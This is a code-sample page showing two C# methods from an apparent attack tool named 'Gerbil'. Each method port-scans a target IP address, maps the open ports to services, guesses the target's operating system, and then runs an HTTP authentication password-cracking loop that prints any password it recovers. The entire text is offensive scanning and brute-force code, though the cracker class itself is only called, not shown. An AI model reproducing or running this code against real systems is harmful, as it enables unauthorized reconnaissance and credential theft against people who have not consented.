Exemplo n.º 1
0
        /// <summary>
        /// Launches an attack on a specific IP address.
        /// </summary>
        /// <param name="ipAddress">IP address or relative hostname to target.</param>
        public static void begin(string ipAddress, int timeout)
        {
            // Scan device for open ports
            Out.writeln("Probing ports...");
            int[] openPorts = Gerbil_Scanners.PortScanner.scan(ipAddress, 0, 1000, timeout);
            if (openPorts.Length > 0)
            {
                for (int i = 0; i < openPorts.Length; i++)
                {
                    Out.writeln("Found port: " + openPorts[i]);
                }
            }
            else
            {
                Out.writeln("No open ports found for the specified host and port range.");
                return;
            }
            // Get list of services
            Out.writeln("Looking up port definitions...");
            string[] openServices = Gerbil_PortServices.PortLookup.getServices(openPorts);
            if (openServices.Length > 0)
            {
                Out.writeln("Found service: ");
                foreach (string i in openServices)
                {
                    Out.writeln(i);
                }
            }
            else
            {
                Out.writeln("No known services found in AI store. Add them manually using 'portservice add serviceName portNumber'");
                return;
            }
            // Generate server information using AI engine
            if (openServices.Contains("NETBIOS"))
            {
                string devName = "";
                devName = Dns.GetHostEntry(ipAddress).HostName;
                Out.writeln("NETBIOS Name: " + devName);
            }
            // Forward found services to the AI engine and get server OS
            //TODO: forward training parameter
            Gerbil_Engine.NetworkResult osr = Gerbil_Engine.GerbilRunner.guessOS(openServices, true);
            float ct = osr.getCertainty();

            ct = ct * 10.0f;
            Out.writeln("OS Guess: " + osr.getName());
            Out.writeln(String.Format("Certainty: {0:F2}%", osr.getCertainty()));
            // Guess more data based on running services
            // HTTP
            if (openServices.Contains("HTTP"))
            {
                // Attempt an HTTP attack
                if (In.securePrompt("Pathfinder", "HTTP Auth Password Crack"))
                {
                    int pLength = In.prompt <int>("Maximum length of password");
                    Out.writeln("Cracking password...");
                    Gerbil.Attackers.HTTPAuthAttacker HAA = new Attackers.HTTPAuthAttacker(ipAddress, pLength);
                    while (true)
                    {
                        Out.write("*");
                        Gerbil.Attackers.AttackerResult AR;
                        try
                        {
                            AR = HAA.stab();
                        }
                        catch (Exception e)
                        {
                            // Error occured, break.
                            break;
                        }
                        if (AR == Attackers.AttackerResult.Trying)
                        {
                            // Continue
                        }
                        else if (AR == Attackers.AttackerResult.FailedAuth || AR == Attackers.AttackerResult.FailedConnection)
                        {
                            Out.writeln("\nFailed to crack password using given parameters.");
                            break;
                        }
                        else if (AR == Attackers.AttackerResult.Connected)
                        {
                            Out.blank();
                            Out.writeln(String.Format("CRACKED: Password is \"{0}\".", HAA.getAccessString()));
                            break;
                        }
                    }
                }
            }
            // Launch attacks
        }
Exemplo n.º 2
0
        private static void attackDeviceAuto(ref Database <Data.Models.Devices.Device> DBref, string devID, int pingTimeout)
        {
            Out.blank();
            // Get data from DB
            string address = DBref.Read(devID).getDeviceIPAddress().ToString();

            // Scan device for open ports
            Out.writeln("Probing known ports on " + address + "...");
            int[]      knownPorts     = Gerbil_PortServices.PortLookup.getPorts();
            List <int> tempFoundPorts = new List <int>();

            foreach (int i in knownPorts)
            {
                if (Gerbil_Scanners.PortScanner.scan(address, i, pingTimeout))
                {
                    tempFoundPorts.Add(i);
                    Out.writeln(i + ": OPEN");
                }
                else
                {
                    Out.writeln(i + ": CLOSED");
                }
            }
            int[] openPorts = tempFoundPorts.ToArray();
            if (openPorts.Length == 0)
            {
                Out.writeln("No open ports found for the specified host and port range.");
                return;
            }
            // Get list of services
            Out.writeln("Looking up port definitions...");
            string[] openServices = Gerbil_PortServices.PortLookup.getServices(openPorts);
            if (openServices.Length > 0)
            {
                Out.writeln("Found service: ");
                foreach (string i in openServices)
                {
                    Out.writeln(i);
                }
            }
            else
            {
                Out.writeln("No known services found in AI store. Add them manually using 'portservice add serviceName portNumber'");
                return;
            }
            if (openServices.Contains("NETBIOS"))
            {
                string devName = "";
                devName = Dns.GetHostEntry(address).HostName;
                Out.writeln("NETBIOS Name: " + devName);
            }
            // Forward found services to the AI engine and get server OS
            //TODO: forward training mode parameter
            Gerbil_Engine.NetworkResult osr = Gerbil_Engine.GerbilRunner.guessOS(openServices, true);
            float ct = osr.getCertainty();

            ct = ct * 1000.0f;
            Out.writeln("OS Guess: " + osr.getName());
            Out.writeln(String.Format("Certainty: {0:F2}%", osr.getCertainty()));
            // Guess more data based on running services
            // HTTP
            if (openServices.Contains("HTTP"))
            {
                // Attempt an HTTP attack
                if (In.securePrompt("AttackMethods", "HTTP Auth Password Crack"))
                {
                    int pLength = In.prompt <int>("Maximum length of password");
                    Out.writeln("Cracking password...");
                    Gerbil.Attackers.HTTPAuthAttacker HAA = new Attackers.HTTPAuthAttacker(address, pLength);
                    while (true)
                    {
                        Out.write("*");
                        Gerbil.Attackers.AttackerResult AR;
                        try
                        {
                            AR = HAA.stab();
                        }
                        catch
                        {
                            // Error occured, break.
                            break;
                        }
                        if (AR == Attackers.AttackerResult.Trying)
                        {
                            // Continue
                        }
                        else if (AR == Attackers.AttackerResult.FailedAuth || AR == Attackers.AttackerResult.FailedConnection)
                        {
                            Out.writeln("\nFailed to crack password using given parameters.");
                            break;
                        }
                        else if (AR == Attackers.AttackerResult.Connected)
                        {
                            Out.blank();
                            Out.writeln(String.Format("CRACKED: Password is \"{0}\".", HAA.getAccessString()));
                            break;
                        }
                    }
                }
            }
        }